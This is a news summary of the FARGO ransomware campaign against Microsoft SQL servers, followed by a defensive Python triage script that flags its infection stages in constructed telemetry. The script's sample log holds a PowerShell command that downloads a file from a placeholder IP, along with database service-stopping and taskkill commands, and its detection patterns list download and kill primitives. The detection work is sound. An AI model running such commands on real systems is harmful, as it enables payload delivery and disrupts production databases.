Threat actors have been targeting vulnerable Microsoft SQL servers with the FARGO ransomware, also known as Mallox and TargetCompany, according to BleepingComputer.
According to an AhnLab Security Emergency Response Center (ASEC) report, a FARGO infection begins with cmd.exe and powershell.exe downloading a .NET file. That loader retrieves additional malware and the locker itself, and it generates and executes a BAT file whose job is to terminate processes and services.
The ransomware payload then injects itself into AppLaunch.exe, a legitimate .NET Framework executable, and from there attempts to delete the registry key of an open-source ransomware vaccine.
The malware also executes a recovery-deactivation command before encrypting, but it excludes key software and directories from encryption, including Microsoft Windows system directories, Tor Browser, Internet Explorer, boot files, the debug log file and thumbnail database, and user customizations and settings. Encrypted files are renamed with the ".Fargo3" extension, and victims are threatened with data leaks should they refuse to pay the demanded ransom, the researchers said.
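As an added example (not code from the SC Media piece, BleepingComputer or the ASEC report), the following Python triage script runs over constructed Sysmon-style process and file-rename events and flags the stages described above: a cmd.exe or powershell.exe download, process and service termination, file renames to the ".Fargo3" extension, and renames performed by AppLaunch.exe. The event schema, hostnames, IP address, file paths and the list of download primitives are assumptions; the page does not say which download method or which termination commands FARGO used.

```python
import json
import re

# Constructed sample telemetry, not taken from the page or the ASEC report:
# one JSON object per line in a minimal Sysmon-like schema. Host "sql01"
# shows the chain described in the article; host "ws07" is benign activity.
SAMPLE_LOG = r'''
{"host":"sql01","event":"process","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c powershell -nop -c \"(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/x.dat','C:\\Users\\Public\\x.dat')\""}
{"host":"sql01","event":"process","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c C:\\Users\\Public\\stop.bat"}
{"host":"sql01","event":"process","image":"C:\\Windows\\System32\\net.exe","cmdline":"net stop MSSQLSERVER /y"}
{"host":"sql01","event":"process","image":"C:\\Windows\\System32\\taskkill.exe","cmdline":"taskkill /F /IM sqlservr.exe"}
{"host":"sql01","event":"file_rename","image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe","old":"D:\\data\\orders.mdf","new":"D:\\data\\orders.mdf.Fargo3"}
{"host":"ws07","event":"process","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -File C:\\scripts\\inventory.ps1"}
{"host":"ws07","event":"file_rename","image":"C:\\Windows\\explorer.exe","old":"C:\\Users\\bob\\notes.txt","new":"C:\\Users\\bob\\notes-old.txt"}
'''

# The two launchers the report names for the initial download stage.
LAUNCHERS = {"cmd.exe", "powershell.exe"}
# Download primitives commonly used in cmd/powershell one-liners (assumption:
# the article does not state which one FARGO's first stage uses).
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b"
    r"|certutil\b.*-urlcache|bitsadmin\b.*/transfer|Start-BitsTransfer",
    re.I,
)
# Process/service termination primitives a BAT file would typically call
# (assumption: the article only says the BAT file kills processes and services).
KILL_RE = re.compile(
    r"\btaskkill\b|\bnet1?\s+stop\b|\bsc\s+stop\b|Stop-Service|Stop-Process", re.I
)
FARGO_EXT = ".fargo3"          # extension the article reports on encrypted files
HOST_PROCESS = "applaunch.exe"  # legitimate .NET host the payload injects into


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\x\\cmd.exe' -> 'cmd.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def stages_of(ev: dict) -> set:
    """Map one event to the set of FARGO chain stages it matches (may be empty)."""
    stages = set()
    image = basename(ev.get("image", ""))
    if ev.get("event") == "process":
        cmd = ev.get("cmdline", "")
        if image in LAUNCHERS and DOWNLOAD_RE.search(cmd):
            stages.add("download")
        if KILL_RE.search(cmd):
            stages.add("kill")
    elif ev.get("event") == "file_rename":
        if ev.get("new", "").lower().endswith(FARGO_EXT):
            stages.add("encrypt")
        if image == HOST_PROCESS:
            stages.add("applaunch_rename")
    return stages


def triage(log_text: str) -> dict:
    """Return {host: set_of_stages_seen} for every host in the JSON-lines log."""
    per_host = {}
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        per_host.setdefault(ev["host"], set()).update(stages_of(ev))
    return per_host


def alerts(per_host: dict, min_stages: int = 2) -> list:
    """Hosts worth paging on: any '.Fargo3' rename, or at least min_stages stages."""
    return sorted(
        host for host, seen in per_host.items()
        if "encrypt" in seen or len(seen) >= min_stages
    )


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for host, seen in sorted(result.items()):
        print(f"{host}: {sorted(seen) or 'no FARGO indicators'}")
    print("alert:", alerts(result))
```

The encrypt stage fires on its own because a ".Fargo3" rename means damage has already started; the other stages are individually noisy (administrators also run `net stop` and PowerShell downloads), so they only raise an alert in combination on the same host.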